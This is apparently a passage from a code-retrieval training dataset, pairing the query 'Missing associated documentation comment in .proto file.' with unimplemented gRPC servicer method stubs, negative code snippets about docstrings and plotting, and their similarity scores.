...], cmap='gray')\n ax_dict['F'].set_title('Moving')\n\n ax_dict['W'].imshow(fixed[0, 0, ...], cmap='gray')\n ax_dict['W'].set_title('Fixed')\n\n for i, ax_name in enumerate(list(\"ABCDEX\")):\n ax_dict[ax_name].imshow(warped[i][0, 0, ...], cmap='gray')\n if ax_name == \"A\":\n ax_dict[ax_name].set_title(\"Affine\")\n else:\n ax_dict[ax_name].set_title(f\"Cascade {i}\")\n\n ax_dict['L'].plot(train_loss, color='red', label='train_loss')\n ax_dict['L'].plot(val_loss, label='val_loss', color='blue')\n ax_dict['L'].plot(reg_loss, label='train_reg_loss', color='green')\n ax_dict['L'].set_title(\"Losses\")\n ax_dict['L'].grid()\n ax_dict['L'].set_xlim(0, args.e)\n ax_dict['L'].legend(loc='upper right')\n ax_dict['L'].scatter(len(train_loss) - 1, train_loss[-1], s=20, color='red')\n ax_dict['L'].scatter(len(val_loss) - 1, val_loss[-1], s=20, color='blue')\n ax_dict['L'].scatter(len(reg_loss) - 1, reg_loss[-1], s=20, color='green')\n\n for i, ax_name in enumerate(list(\"GHIJKM\")):\n plot_grid(ax_dict[ax_name], flows[i][0, ...])\n if ax_name == \"G\":\n ax_dict[ax_name].set_title(\"Affine\")\n else:\n ax_dict[ax_name].set_title(f\"Cascade {i}\")\n\n plt.suptitle(f\"Epoch {epoch}\")\n plt.savefig(f'./ckp/visualization/epoch_{epoch}.png')", "def show_test_results(true_labels: List[int], predictions: List[int], class_names: List[str]):\n confusion_mtx = confusion_matrix(true_labels, predictions)\n plt.figure(figsize=(10, 8))\n sns.heatmap(confusion_mtx, xticklabels=class_names, yticklabels=class_names,\n annot=True, fmt='g')\n plt.xlabel('Prediction')\n plt.ylabel('Label')\n plt.title(\"Confusion matrix\")\n plt.show()\n print(classification_report(true_labels, predictions, target_names=class_names, digits=DIGITS))", "def partial_dependence_plot(model, data, important_labels, feature_names):\n n_plots_per_row = 3\n n_plots = ceil(important_labels.shape[0] / n_plots_per_row)\n\n for plot_index, x_index in enumerate(important_labels, 1):\n target = X_train[:, x_index]\n unique_target = np.unique(target)\n n_unique = unique_target.shape[0]\n\n is_categorical = n_unique == 2\n if is_categorical:\n x_points = unique_target\n y_points = np.zeros_like(unique_target)\n else:\n # for numeric values, generate a fix number of values\n # in between the min and max value of the target column\n n_points = min(n_unique, 50)\n x_points = np.linspace(np.min(target), np.max(target), n_points)\n y_points = np.zeros_like(x_points)\n\n for i in range(x_points.shape[0]):\n x_data = data.copy()\n x_data[:, x_index] = x_points[i]\n y_pred = model.predict(x_data)\n y_points[i] = np.mean(y_pred)\n\n plt.subplot(n_plots, n_plots_per_row, plot_index)\n if is_categorical:\n plt.bar(x_points, y_points)\n else:\n plt.plot(x_points, y_points)\n\n plt.title(feature_names[x_index])\n\n plt.tight_layout()\n plt.show()", "def actvspred(modelname, predmodel):\n predscores, actualscores, meanerr, rmsqerr = predmodel\n plt.figure()\n plt.scatter(actualscores,predscores,s=70)\n x = np.array(range(100))\n plt.plot(x,x,'g',label='optimal model')\n # make regression\n rob.globalenv[\"pred\"] = FV(predscores)\n rob.globalenv[\"act\"] = FV(actualscores)\n mult_lm = stats.lm(\"pred ~ act + 1\")\n coeffs = np.array(mult_lm.rx(\"coefficients\")[0])\n rsqrd = base.summary(mult_lm).rx(\"r.squared\")[0][0]\n y = coeffs[1]*x+coeffs[0]\n plt.plot(x,y,'k',label='our model',linewidth=2)\n plt.xlabel(\"actual lsas delta\")\n plt.ylabel(\"predicted lsas delta\")\n plt.title(modelname)\n plt.axis([0,100,0,100])\n axes = plt.axes()\n axes.grid(b=True)\n axes.text(0.05,0.8,\"meanerr: %.2f\\nrmse: %.2f\\nr: %.2f (Rsqrd: %.2f)\"%(meanerr,rmsqerr,np.sqrt(rsqrd),rsqrd),transform=axes.transAxes)\n #plt.legend()\n plt.savefig(os.path.join(outdir,\"%s_crossval.png\"%modelname),dpi=300,format=\"png\")", "def plot_train_test_data(train, test):\n fig = plt.figure()\n ax1 = fig.add_subplot(1, 2, 1)\n ax1.spy(train, precision=0.01, markersize=0.5)\n ax1.set_xlabel(\"Users\")\n ax1.set_ylabel(\"Items\")\n ax1.set_title(\"Training data\")\n ax2 = fig.add_subplot(1, 2, 2)\n ax2.spy(test, precision=0.01, markersize=0.5)\n ax2.set_xlabel(\"Users\")\n ax2.set_ylabel(\"Items\")\n ax2.set_title(\"Test data\")\n plt.tight_layout()\n plt.savefig(\"train_test\")\n plt.show()" ]
[ "0.7095982", "0.7095982", "0.6836742", "0.6829876", "0.6635602", "0.6579234", "0.6553575", "0.65293133", "0.6511318", "0.64920896", "0.6491192", "0.6463729", "0.6444954", "0.64443487", "0.6430439", "0.6392063", "0.6367903", "0.635039", "0.6348396", "0.63420445", "0.6334286", "0.6328053", "0.623977", "0.62203723", "0.6194698", "0.6145043", "0.6139883", "0.61329883", "0.61315995", "0.61252916", "0.6120382", "0.61133194", "0.6109218", "0.6105611", "0.60996616", "0.60910857", "0.60847884", "0.608436", "0.607955", "0.60725933", "0.60577077", "0.60547733", "0.6053747", "0.60466623", "0.60415685", "0.60255975", "0.6024758", "0.6021", "0.60125065", "0.6005277", "0.6003386", "0.599986", "0.599127", "0.5966957", "0.5963656", "0.59545326", "0.59474075", "0.59425414", "0.5936344", "0.5931039", "0.59240127", "0.5920911", "0.5907627", "0.59038377", "0.5881447", "0.58653474", "0.5859206", "0.5853379", "0.58417296", "0.5832073", "0.58277565", "0.58218414", "0.58165604", "0.58139724", "0.5806851", "0.5799951", "0.57987064", "0.5783701", "0.57745296", "0.5772322", "0.57713604", "0.5767007", "0.5749034", "0.57385594", "0.5738232", "0.5736593", "0.5726125", "0.5715036", "0.5711925", "0.57116365", "0.57083285", "0.5699618", "0.5697638", "0.56945467", "0.5694475", "0.5693291", "0.5692672", "0.5688889", "0.5688073", "0.56818587" ]
0.6863375
2
Missing associated documentation comment in .proto file.
def Profile(self, request, context): context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def init_doc(self):\n raise NotImplementedError()", "def inherits_doc():\n pass", "def documentation_only():\n pass", "def DocString():\n return", "def test_module_doc(self):\n self.assertTrue(len(base.__doc__) > 0)", "def pythondoc(self, irc, msg, args, num, req):\n self.googleq('http://docs.python.org/library/', req, num, irc)", "def cppdoc(self, irc, msg, args, num, req):\n self.googleq('www.cplusplus.com/reference/', req, num, irc)", "def testDocstring(self):\n class NotImportant(messages.Enum):\n \"\"\"I have a docstring.\"\"\"\n\n VALUE1 = 1\n\n self.assertEquals('I have a docstring.', NotImportant.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(base_model.__doc__) > 0)", "def phpdoc(self, irc, msg, args, num, req):\n self.googleq('http://php.net/manual/en/', req, num, irc)", "def strip_doc_string(proto: google.protobuf.message.Message) -> None:\n if not isinstance(proto, google.protobuf.message.Message):\n raise TypeError(\n f\"proto must be an instance of {google.protobuf.message.Message}.\"\n )\n for descriptor in proto.DESCRIPTOR.fields:\n if descriptor.name == \"doc_string\":\n proto.ClearField(descriptor.name)\n elif descriptor.type == descriptor.TYPE_MESSAGE:\n if descriptor.label == descriptor.LABEL_REPEATED:\n for x in getattr(proto, descriptor.name):\n strip_doc_string(x)\n elif proto.HasField(descriptor.name):\n strip_doc_string(getattr(proto, descriptor.name))", "def docstring_hack():\n pass", "def check_documentation(self):\n\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(__init__.__doc__)\n self.assertIsNotNone(__str__.__doc__)\n self.assertIsNotNone(save.__doc__)\n self.assertIsNotNone(to_dict.__doc__)", "def consistent_documentation():\n\n return 3", "def test_init_doc(self):\n self.assertTrue(\n len(Review.__init__.__doc__) > 10\n )", "def test_missing_docstring(a, b): # noqa: D213, D407", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)", "def test_docstring(self):\n self.assertTrue(len(BaseModel.__doc__) > 1)\n self.assertTrue(len(BaseModel.__init__.__doc__) > 1)\n self.assertTrue(len(BaseModel.__str__.__doc__) > 1)\n self.assertTrue(len(BaseModel.save.__doc__) > 1)\n self.assertTrue(len(BaseModel.to_dict.__doc__) > 1)", "def __doc__(self, ???):", "def test_class_doc(self):\n self.assertTrue(\n len(Review.__doc__) > 10\n )", "def test_module_doc(self):\n self.assertTrue(len(amenity.__doc__) > 0)", "def test_docstring(self):\n self.assertIsNotNone(Base.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(r.__doc__) > 10)", "def test_docstring(self):\n self.assertIsNotNone(Place.__doc__)", "def test_documentation(self):\n self.assertTrue(hasattr(Base, \"__init__\"))\n self.assertTrue(hasattr(Base, \"create\"))\n self.assertTrue(hasattr(Base, \"to_json_string\"))\n self.assertTrue(hasattr(Base, \"from_json_string\"))\n self.assertTrue(hasattr(Base, \"save_to_file\"))\n self.assertTrue(hasattr(Base, \"load_from_file\"))\n self.assertTrue(Base.__init__.__doc__)\n self.assertTrue(Base.create.__doc__)\n self.assertTrue(Base.to_json_string.__doc__)\n self.assertTrue(Base.from_json_string.__doc__)\n self.assertTrue(Base.save_to_file.__doc__)\n self.assertTrue(Base.load_from_file.__doc__)", "def has_doc() -> None:", "def test_doc(self):\n self.assertTrue(len(max_integer.__doc__) > 0)\n self.assertTrue(len(__import__('6-max_integer').__doc__) > 0)", "def test_docstring(self):\n self.assertTrue(len(City.__doc__) > 1)\n self.assertTrue(len(City.__init__.__doc__) > 1)\n self.assertTrue(len(City.__str__.__doc__) > 1)\n self.assertTrue(len(City.save.__doc__) > 1)\n self.assertTrue(len(City.to_dict.__doc__) > 1)", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)\n self.assertIsNotNone(Review.text.__doc__)", "def test_docstring(self):\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)", "def fini_doc(self):\n raise NotImplementedError()", "def test_doc():\n pass", "def test_module_doc(self):\n self.assertTrue(len(user.__doc__) > 0)", "def lispdoc(self, irc, msg, args, num, req):\n self.googleq('http://lispdoc.com/', req, num, irc)", "def test_module_doc(self):\n self.assertTrue(len(models.amenity.__doc__) > 0)", "def bus_func_doc(self, bus):\n return None", "def test_doc2(self):\n assert Review.__doc__ is not None", "def c_comment(self, token: Token):\n if token.value.startswith(\"/**\"):\n self.doc_comments.append(PrefixCppDocComment(token))", "def test_module_doc(self):\n self.assertTrue(len(State.__doc__) > 0)", "def test_module_doc(self):\n self.assertTrue(len(db_storage.__doc__) > 0)", "def test_BaseModel_cls_doc(self):\n self.assertIsNotNone(BaseModel.__doc__)", "def doc_string():\n pass # pass does nothing", "def test_docstrings(self):\n self.assertEqual(len(Rectangle.__doc__) > 0, True)\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def test_student_module_docstring(self):\n self.assertIsNot(student.__doc__, None,\n \"student.py needs a docstring\")\n self.assertTrue(len(student.__doc__) >= 1,\n \"student.py needs a docstring\")", "def test_documentation(self):\n doc = City.__doc__\n self.assertGreaterEqual(len(doc), 1)", "def test_Userdoc(self):\n self.assertNotEqual(len(User.__doc__), 0)", "def __init__ (self, docstring, name, isInternal):\n\n # Take out excess leading blank lines.\n docstring = re.sub('/\\*\\*(\\s+\\*)+', r'/** \\n *', docstring)\n\n self.docstring = docstring\n self.name = name\n self.isInternal = isInternal", "def test_module_doc(self):\n self.assertTrue(len(city.__doc__) > 0)", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def test_BaseModel_methods_doc(self):\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.__str__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)\n self.assertIsNotNone(BaseModel.to_dict.__doc__)", "def javadoc(self, irc, msg, args, num, req):\n self.googleq('download.oracle.com/javase/6/docs/', req, num, irc)", "def implement(self):\n\t#@DEBUG remove comments", "def magic_pdoc(self, parameter_s=''):\n self._inspect('pdoc',parameter_s)", "def dummy(doc):\r\n return doc", "def test_proto_spec(self):\n proto_name = 'org.xlattice.upax'\n node_reg = reg.NodeReg()\n proto_reg = reg.ProtoReg(proto_name, node_reg)\n msg_reg = reg.MsgReg(proto_reg)\n proto_spec = M.ProtoSpec(proto_name, proto_reg)\n self.assertEqual(proto_name, proto_spec.name)\n parent = M.ProtoSpec(proto_name, proto_reg)\n\n msg_name = 'logEntry'\n # the enum is not used\n enum = M.EnumSpec.create('Joe', [\n ('oh', 92), ('hello', 47), ('there', 322), ])\n fields = [\n # pylint: disable=no-member\n M.FieldSpec(\n msg_reg,\n 'timestamp',\n FieldTypes.F_UINT32,\n Quants.REQUIRED,\n 0),\n M.FieldSpec(\n msg_reg,\n 'node_id',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 1),\n M.FieldSpec(\n msg_reg,\n 'key',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 2),\n M.FieldSpec(\n msg_reg,\n 'length',\n FieldTypes.V_UINT32,\n Quants.REQUIRED,\n 3),\n M.FieldSpec(\n msg_reg,\n 'by_',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 4),\n M.FieldSpec(\n msg_reg,\n 'path',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 5),\n ]\n msg_spec = M.MsgSpec(msg_name, msg_reg, proto_spec)\n self.assertEqual(msg_name, msg_spec.name)\n for file in fields:\n msg_spec.add_field(file)\n\n # proto_spec.add_msg(msg_spec) # correctly commented out\n self.round_trip_poto_spec_via_string(proto_spec) # GEEP", "def _add_doc(func, doc):\n func.__doc__ = doc", "def test_student_class_docstring(self):\n self.assertIsNot(Student.__doc__, None,\n \"Student class needs a docstring\")\n self.assertTrue(len(Student.__doc__) >= 1,\n \"Student class needs a docstring\")", "def main_docstring():", "def test_docstring(self):\n self.assertTrue(len(FileStorage.__doc__) > 1)\n self.assertTrue(len(FileStorage.all.__doc__) > 1)\n self.assertTrue(len(FileStorage.new.__doc__) > 1)\n self.assertTrue(len(FileStorage.save.__doc__) > 1)\n self.assertTrue(len(FileStorage.reload.__doc__) > 1)", "def describe(self):\n return \"The method describe() is not implemented\"", "def test_console_documented(self):\n self.assertTrue\n self.assertTrue\n (len(HBNBCommand.__doc__) >= 1)", "def __init__(self, proto):\n self.proto = proto", "def test_class_docstrings(self):\n self.assertGreater(len(self.storage.__doc__), 1)", "def func_doc():", "def get_documentation(self, *args, **dargs):\n pass", "def __init__ (self, isInternal, docstring, name, args, isConst):\n\n self.name = name\n self.isConst = isConst\n self.isInternal = isInternal\n\n if isInternal:\n if language == 'java':\n # We have a special Javadoc doclet that understands a non-standard\n # Javadoc tag, @internal. When present in the documentation string\n # of a method, it causes it to be excluded from the final\n # documentation output. @internal is something doxygen offers.\n #\n p = re.compile('(\\s+?)\\*/', re.MULTILINE)\n self.docstring = p.sub(r'\\1* @internal\\1*/', docstring)\n elif language == 'csharp':\n # We mark internal methods in a different way for C#.\n self.docstring = docstring\n else:\n self.docstring = \" @internal\\n\" + docstring\n else:\n self.docstring = docstring\n\n # In Java and C#, if a method is const and swig has to translate the type,\n # then for some reason swig cannot match up the resulting doc strings\n # that we put into %javamethodmodifiers. The result is that the java\n # documentation for the methods are empty. I can't figure out why, but\n # have figured out that if we omit the argument list in the doc string\n # that is put on %javamethodmodifiers for such case, swig does generate \n # the comments for those methods. This approach is potentially dangerous\n # because swig might attach the doc string to the wrong method if a\n # methods has multiple versions with varying argument types, but the\n # combination doesn't seem to arise in antimony currently, and anyway,\n # this fixes a real problem in the Java documentation for antimony.\n\n if language == 'java' or language == 'csharp':\n if isConst and (args.find('unsigned int') >= 0):\n self.args = ''\n elif not args.strip() == '()':\n if isConst:\n self.args = args + ' const'\n else:\n self.args = args\n else:\n if isConst:\n self.args = '() const'\n else:\n self.args = ''\n else:\n self.args = args", "def guess(cls, docstring):", "def HandleMissingParameterDoc(self, token, param_name):\n raise TypeError('Abstract method HandleMissingParameterDoc not implemented')", "def shortDescription(self):\n # Suppress default logging of docstrings.\n return None", "def docs():", "def __init__(self):\n super(MethodInfo, self).__init__()\n self.DocString = None", "def test_file_storage_module_docstring(self):\n self.assertIsNot(file_storage.__doc__, None,\n \"file_storage.py needs a docstring\")\n self.assertTrue(len(file_storage.__doc__) >= 1,\n \"file_storage.py needs a docstring\")", "def handle_protobuf(self, message: protobuf.ProtocolMessage) -> None:", "def test_doc_file(self):\n expected = 'City class handles all application cities'\n actual = City.__doc__\n self.assertEqual(expected, actual)", "def missed_needed_docstring(self):\n self.needed += 1\n self.missing += 1", "def test_documentation(self):\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def __init__(\n self,\n *,\n public_comment: typing.Optional[str] = None,\n status: typing.Optional[Assignment.Status] = None\n ) -> None:\n ...", "def test_class_doc(self):\n self.assertTrue(len(City.__doc__) > 0)", "def test_doc1(self):\n assert models.review.__doc__ is not None", "def test_doctest(self):\n self.assertTrue(BaseModel.__doc__)\n self.assertTrue(BaseModel.__init__.__doc__)\n self.assertTrue(BaseModel.__str__.__doc__)\n self.assertTrue(BaseModel.save.__doc__)\n self.assertTrue(BaseModel.to_dict.__doc__)", "def should_add_pr_comment(self):\n pass", "def test_findDocumentation(self):\n doc = self.builder._findChanges(\n self.project, self.builder._DOC)\n self.assertEquals(\n doc,\n [(40, 'foo.bar.Baz.quux'),\n (41, 'writing Foo servers')])", "def test_doc_with_comments():\n doc = CoNLL.conll2doc(input_str=RUSSIAN_SAMPLE)\n check_russian_doc(doc)", "def test_method_docs(self):\n for func in dir(Base):\n self.assertTrue(len(func.__doc__) > 0)", "def public_fn_with_googley_docstring(self, name, another, state=None):\n return 0", "def test_state_class_docstring(self):\n self.assertIsNot(State.__doc__, None,\n \"docstring not found in State class\")\n self.assertTrue(len(State.__doc__) >= 1,\n \"docstring not found in State class\")", "def getStructPb2():\n return struct_pb2", "def to_proto(self) -> None:\n\n pass", "def test_doc_string():\n # Create fake profiles library by named tuples\n faker_db = session10.create_fake_library_by_namedtuple(10)\n\n assert len(faker_db.__doc__) > 0 , \"Doc string is missing\"", "def test_swagger_field_is_required():\n raw_schema = RawSchemaFactory()\n raw_schema.pop('swagger', None)\n\n assert 'swagger' not in raw_schema\n\n with pytest.raises(ValidationError) as err:\n swagger_schema_validator(raw_schema)\n\n assert_message_in_errors(\n MESSAGES['required']['required'],\n err.value.detail,\n 'required.swagger',\n )", "def brief_documentation(method: object) -> str:\n doc = method.__doc__\n if doc is not None:\n lines = doc.splitlines()\n if len(lines) > 0:\n return lines[0]\n return ''", "def proto_generation_callable(self):\n raise NotImplementedError()", "def proto_generation_callable(self):\n raise NotImplementedError()", "def document(self):\n ...", "def assert_doc_extensions(doc):\n pass", "def comment():", "def test_doc_module(self):\n from models import user\n\n self.assertTrue(len(user.__doc__) > 0)\n self.assertTrue(len(user.User.__doc__) > 0)", "def test_doc(cls, type_str):\n do_doc_test(cls, type_str)", "def test_docstring(self):\n self.assertIsNotNone(City.__doc__)" ]
[ "0.6347405", "0.62316597", "0.62253404", "0.6107218", "0.60712713", "0.6055634", "0.60191995", "0.5996731", "0.597168", "0.59466904", "0.59434444", "0.59335643", "0.5919223", "0.5902901", "0.58987755", "0.5864407", "0.5856765", "0.5836615", "0.57913834", "0.57687634", "0.5763714", "0.57372254", "0.5724019", "0.5721367", "0.57097507", "0.5693322", "0.5633919", "0.5631681", "0.5627807", "0.56277686", "0.5608027", "0.55785465", "0.5573401", "0.55674845", "0.55551904", "0.5549059", "0.553947", "0.5534518", "0.5531683", "0.55310714", "0.55151445", "0.55110514", "0.5500249", "0.5493004", "0.548441", "0.5478941", "0.5474353", "0.5463836", "0.5458455", "0.5458455", "0.5458455", "0.5452267", "0.54450864", "0.54251957", "0.5421046", "0.5412398", "0.5397417", "0.5395437", "0.5393102", "0.5386761", "0.53758156", "0.5353344", "0.53435314", "0.5338307", "0.5337008", "0.53325796", "0.53264475", "0.5325588", "0.5324948", "0.5321367", "0.53188294", "0.5317395", "0.5313514", "0.5306335", "0.52826846", "0.526687", "0.5262916", "0.5252228", "0.52204585", "0.52173424", "0.52134776", "0.5213095", "0.5209492", "0.52052844", "0.5204341", "0.51928616", "0.51881623", "0.5186641", "0.51833606", "0.5181922", "0.51770014", "0.51718605", "0.5163659", "0.5162326", "0.5162326", "0.5161769", "0.51591885", "0.5157628", "0.5145468", "0.51423216", "0.5138763" ]
0.0
-1
Missing associated documentation comment in .proto file.
def Binary(self, request, context): context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def init_doc(self):\n raise NotImplementedError()", "def inherits_doc():\n pass", "def documentation_only():\n pass", "def DocString():\n return", "def test_module_doc(self):\n self.assertTrue(len(base.__doc__) > 0)", "def pythondoc(self, irc, msg, args, num, req):\n self.googleq('http://docs.python.org/library/', req, num, irc)", "def cppdoc(self, irc, msg, args, num, req):\n self.googleq('www.cplusplus.com/reference/', req, num, irc)", "def testDocstring(self):\n class NotImportant(messages.Enum):\n \"\"\"I have a docstring.\"\"\"\n\n VALUE1 = 1\n\n self.assertEquals('I have a docstring.', NotImportant.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(base_model.__doc__) > 0)", "def phpdoc(self, irc, msg, args, num, req):\n self.googleq('http://php.net/manual/en/', req, num, irc)", "def strip_doc_string(proto: google.protobuf.message.Message) -> None:\n if not isinstance(proto, google.protobuf.message.Message):\n raise TypeError(\n f\"proto must be an instance of {google.protobuf.message.Message}.\"\n )\n for descriptor in proto.DESCRIPTOR.fields:\n if descriptor.name == \"doc_string\":\n proto.ClearField(descriptor.name)\n elif descriptor.type == descriptor.TYPE_MESSAGE:\n if descriptor.label == descriptor.LABEL_REPEATED:\n for x in getattr(proto, descriptor.name):\n strip_doc_string(x)\n elif proto.HasField(descriptor.name):\n strip_doc_string(getattr(proto, descriptor.name))", "def docstring_hack():\n pass", "def check_documentation(self):\n\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(__init__.__doc__)\n self.assertIsNotNone(__str__.__doc__)\n self.assertIsNotNone(save.__doc__)\n self.assertIsNotNone(to_dict.__doc__)", "def consistent_documentation():\n\n return 3", "def test_init_doc(self):\n self.assertTrue(\n len(Review.__init__.__doc__) > 10\n )", "def test_missing_docstring(a, b): # noqa: D213, D407", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)", "def test_docstring(self):\n self.assertTrue(len(BaseModel.__doc__) > 1)\n self.assertTrue(len(BaseModel.__init__.__doc__) > 1)\n self.assertTrue(len(BaseModel.__str__.__doc__) > 1)\n self.assertTrue(len(BaseModel.save.__doc__) > 1)\n self.assertTrue(len(BaseModel.to_dict.__doc__) > 1)", "def __doc__(self, ???):", "def test_class_doc(self):\n self.assertTrue(\n len(Review.__doc__) > 10\n )", "def test_module_doc(self):\n self.assertTrue(len(amenity.__doc__) > 0)", "def test_docstring(self):\n self.assertIsNotNone(Base.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(r.__doc__) > 10)", "def test_docstring(self):\n self.assertIsNotNone(Place.__doc__)", "def test_documentation(self):\n self.assertTrue(hasattr(Base, \"__init__\"))\n self.assertTrue(hasattr(Base, \"create\"))\n self.assertTrue(hasattr(Base, \"to_json_string\"))\n self.assertTrue(hasattr(Base, \"from_json_string\"))\n self.assertTrue(hasattr(Base, \"save_to_file\"))\n self.assertTrue(hasattr(Base, \"load_from_file\"))\n self.assertTrue(Base.__init__.__doc__)\n self.assertTrue(Base.create.__doc__)\n self.assertTrue(Base.to_json_string.__doc__)\n self.assertTrue(Base.from_json_string.__doc__)\n self.assertTrue(Base.save_to_file.__doc__)\n self.assertTrue(Base.load_from_file.__doc__)", "def has_doc() -> None:", "def test_doc(self):\n self.assertTrue(len(max_integer.__doc__) > 0)\n self.assertTrue(len(__import__('6-max_integer').__doc__) > 0)", "def test_docstring(self):\n self.assertTrue(len(City.__doc__) > 1)\n self.assertTrue(len(City.__init__.__doc__) > 1)\n self.assertTrue(len(City.__str__.__doc__) > 1)\n self.assertTrue(len(City.save.__doc__) > 1)\n self.assertTrue(len(City.to_dict.__doc__) > 1)", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)\n self.assertIsNotNone(Review.text.__doc__)", "def test_docstring(self):\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)", "def fini_doc(self):\n raise NotImplementedError()", "def test_doc():\n pass", "def test_module_doc(self):\n self.assertTrue(len(user.__doc__) > 0)", "def lispdoc(self, irc, msg, args, num, req):\n self.googleq('http://lispdoc.com/', req, num, irc)", "def test_module_doc(self):\n self.assertTrue(len(models.amenity.__doc__) > 0)", "def bus_func_doc(self, bus):\n return None", "def test_doc2(self):\n assert Review.__doc__ is not None", "def c_comment(self, token: Token):\n if token.value.startswith(\"/**\"):\n self.doc_comments.append(PrefixCppDocComment(token))", "def test_module_doc(self):\n self.assertTrue(len(State.__doc__) > 0)", "def test_module_doc(self):\n self.assertTrue(len(db_storage.__doc__) > 0)", "def test_BaseModel_cls_doc(self):\n self.assertIsNotNone(BaseModel.__doc__)", "def doc_string():\n pass # pass does nothing", "def test_docstrings(self):\n self.assertEqual(len(Rectangle.__doc__) > 0, True)\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def test_student_module_docstring(self):\n self.assertIsNot(student.__doc__, None,\n \"student.py needs a docstring\")\n self.assertTrue(len(student.__doc__) >= 1,\n \"student.py needs a docstring\")", "def test_documentation(self):\n doc = City.__doc__\n self.assertGreaterEqual(len(doc), 1)", "def test_Userdoc(self):\n self.assertNotEqual(len(User.__doc__), 0)", "def __init__ (self, docstring, name, isInternal):\n\n # Take out excess leading blank lines.\n docstring = re.sub('/\\*\\*(\\s+\\*)+', r'/** \\n *', docstring)\n\n self.docstring = docstring\n self.name = name\n self.isInternal = isInternal", "def test_module_doc(self):\n self.assertTrue(len(city.__doc__) > 0)", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def test_BaseModel_methods_doc(self):\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.__str__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)\n self.assertIsNotNone(BaseModel.to_dict.__doc__)", "def javadoc(self, irc, msg, args, num, req):\n self.googleq('download.oracle.com/javase/6/docs/', req, 